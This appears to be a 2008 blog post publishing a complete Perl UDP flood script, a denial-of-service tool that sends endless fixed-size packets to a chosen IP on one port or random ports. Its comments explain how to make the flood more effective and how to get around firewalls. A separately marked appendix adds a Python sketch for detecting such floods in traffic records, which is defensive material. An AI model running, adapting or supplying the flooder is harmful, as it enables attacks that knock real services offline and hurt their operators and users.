Friday, April 25, 2008

UDP flooder

I wrote this because every other one that I found was written incorrectly. This one actually works (and sometimes too well).

#!/usr/bin/perl

# This is a proof of concept UDP flooder. By you executing
# this program, you accept complete liability for any damages
# caused by it.
# made by nwo - 12/11/05

use Socket;

$ARGC = @ARGV;

# hit random, non sequential ports
sub rports {
print "Hitting: $ip\n";
print "Packetsize: $size\n\n";
for(;;) {
$port = int(rand 65535) + 1;
send(pkt, "@{$DATA}", 0, sockaddr_in($port, $dest));
}
}


if($ARGC != 3) {
print "$0 (ip) (port) (size)\n";
print "If \"port\" is set to \"0\", will send to random ports.\n";
exit(0);
}


$ip=$ARGV[0];
$port=$ARGV[1];
$size=$ARGV[2];

# there's a 4 byte pad added to every 1 byte of data, and 1432 is
# the maximum packet size before fragmentation occurs and fragmented
# UDP packets aren't going to have much effect, but we'll leave it up
# to the user's discretion.
# - nwo
if($size > "710") {
print "This packet is over 1432 bytes and will be fragmented.\n";
}

# this is the "trick", as every other idiot out there has attempted to
# define the packet size by simply using $size = $ARGV[whatever], which
# is incorrect as UDP is intended to be a data transport, thus the packet
# data must contain legitimate data or the packet size will be the actual
# scalar value of whatever the size is specified as. So here, we fill the
# @DATA array with the letter "A" for each byte specified, then make a
# reference pointer to it.
# - nwo
for(1..$size){
push @{$DATA},"A"
}

# this is another "trick", as I've seen more than one instance where the
# socket creation is created within the while() loop, thus slowing down
# the packets per second, as well as hogging CPU and chewing up file descriptors.
# you kids need to read before trying to create something you don't understand.
# - nwo
socket(pkt, PF_INET, SOCK_DGRAM, getprotobyname("udp")) || die "setsockopt: $!";
$dest = inet_aton($ip);


print "UDPP - nwo\n";

if($port == 0) { &rports; }

# Hit specified port rather than random. Not as effective, but in a scenario
# where the attacker is behind a firewall, it's the only way to bypass it.
# Unfortunately, because this does not use raw sockets (by design), there is
# no way to specify the local port number. This somewhat hinders things, as
# if the firewall on the receiving end is set to only allow packets from
# src_ip:53, for example, the firewall will drop any packet being sent NOT
# coming from source port 53.
# - nwo
if($port ne "0") {
print "Hitting: $ip\n";
print "Packetsize: $size\n";
for(;;) {
send(pkt, "@{$DATA}", 0, sockaddr_in($port, $dest));
}
}
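
Seen from the receiving side, traffic from the script above has a recognisable shape: the socket is created once, so every datagram carries the same source address and source port, the payload length never changes, and in random-port mode the destination ports are spread across the whole range. The Python sketch below is an added example for detection, not part of the original post; the record layout, thresholds, addresses and sample traffic are all assumptions constructed for illustration.

```python
from collections import defaultdict

# Constructed thresholds (assumptions; tune against real baseline traffic).
WINDOW_S = 1.0        # width of each time bucket in seconds
MIN_PACKETS = 200     # packets per source/target per bucket before scoring
MIN_PORT_RATIO = 0.9  # distinct destination ports / packets => port spray

def detect_udp_floods(records):
    """records: iterable of (ts, src_ip, src_port, dst_ip, dst_port, udp_len).
    Returns one alert dict per (bucket, src, dst) above the rate threshold."""
    buckets = defaultdict(list)
    for ts, src, sport, dst, dport, length in records:
        buckets[(int(ts // WINDOW_S), src, dst)].append((sport, dport, length))
    alerts = []
    for (bucket, src, dst), pkts in sorted(buckets.items()):
        if len(pkts) < MIN_PACKETS:
            continue
        sports = {p[0] for p in pkts}
        dports = {p[1] for p in pkts}
        sizes = {p[2] for p in pkts}
        if len(dports) / len(pkts) >= MIN_PORT_RATIO:
            mode = "random-port"
        elif len(dports) == 1:
            mode = "single-port"
        else:
            mode = "mixed"
        alerts.append({
            "window_start": bucket * WINDOW_S,
            "src": src, "dst": dst, "packets": len(pkts), "mode": mode,
            "fixed_size": len(sizes) == 1,          # every datagram same length
            "single_src_port": len(sports) == 1,    # one long-lived socket
        })
    return alerts

def sample_records():
    """Constructed traffic: a port spray, a single-port stream, normal DNS."""
    recs = []
    for i in range(500):   # one source, one socket, ports spread over the range
        recs.append((10.0 + i / 1000, "192.0.2.10", 40001, "198.51.100.5",
                     (i * 7919) % 65535 + 1, 1427))
    for i in range(300):   # one source, one socket, one destination port
        recs.append((10.0 + i / 1000, "192.0.2.20", 40002, "198.51.100.5", 53, 1427))
    for i in range(20):    # ordinary low-rate queries with varied sizes
        recs.append((10.0 + i / 25, "192.0.2.30", 50000 + i, "198.51.100.5", 53, 60 + i))
    return recs

if __name__ == "__main__":
    for alert in detect_udp_floods(sample_records()):
        print(alert)
```

Because the source address is the real one (the script does not use raw sockets), an alert's `src` field is directly usable for rate limiting or an upstream block request.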
